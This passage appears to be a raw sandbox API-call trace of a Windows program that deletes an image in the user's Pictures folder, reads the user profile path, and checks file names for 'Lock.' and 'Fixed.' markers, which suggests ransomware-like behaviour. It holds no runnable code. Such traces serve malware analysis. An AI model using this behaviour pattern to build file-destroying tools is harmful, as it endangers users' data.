cFileName="LXxgX8.png", cAlternateFileName="")) returned 0x9e2078 [0210.862] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\LXxgX8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lxxgx8.png")) returned 1 [0210.866] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a6af340, ftCreationTime.dwHighDateTime=0x1d5d2e8, ftLastAccessTime.dwLowDateTime=0x2074fe10, ftLastAccessTime.dwHighDateTime=0x1d5d802, ftLastWriteTime.dwLowDateTime=0x2074fe10, ftLastWriteTime.dwHighDateTime=0x1d5d802, nFileSizeHigh=0x0, nFileSizeLow=0x99c9, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="LXxgX8.png", cAlternateFileName="")) returned 0 [0210.866] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0210.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.867] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0210.867] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa690 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.867] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0210.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0210.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5d700 [0210.869] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/LXxgX8.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\LXxgX8.png", lpFilePart=0x8cf650*="LXxgX8.png") returned 0x23 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d700 | out: hHeap=0x2af0000) returned 1 [0210.869] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\LXxgX8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lxxgx8.png")) returned 0xffffffff [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3f58 | out: hHeap=0x2af0000) returned 1 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.869] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0210.869] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.869] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0210.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0210.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0210.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0210.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mwiYwwD-pGtpU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wiYwwD-pGtpU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iYwwD-pGtpU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YwwD-pGtpU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wwD-pGtpU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wD-pGtpU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D-pGtpU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-pGtpU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pGtpU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GtpU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tpU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pU_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YSC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SC3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0210.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.871] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0210.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0210.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0210.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0210.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0210.871] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0210.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0210.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0210.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2aa6450 [0210.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mwiYwwD-pGtpU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wiYwwD-pGtpU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iYwwD-pGtpU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YwwD-pGtpU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wwD-pGtpU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wD-pGtpU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D-pGtpU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-pGtpU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pGtpU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GtpU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tpU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pU_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YSC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SC3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0210.872] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C3.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0210.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6370 [0210.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0210.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6370 | out: hHeap=0x2af0000) returned 1 [0210.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0210.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0210.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0210.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0210.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0210.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0210.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0210.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0210.873] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0210.873] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0210.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0210.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0210.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0210.873] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.874] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0210.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0210.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: 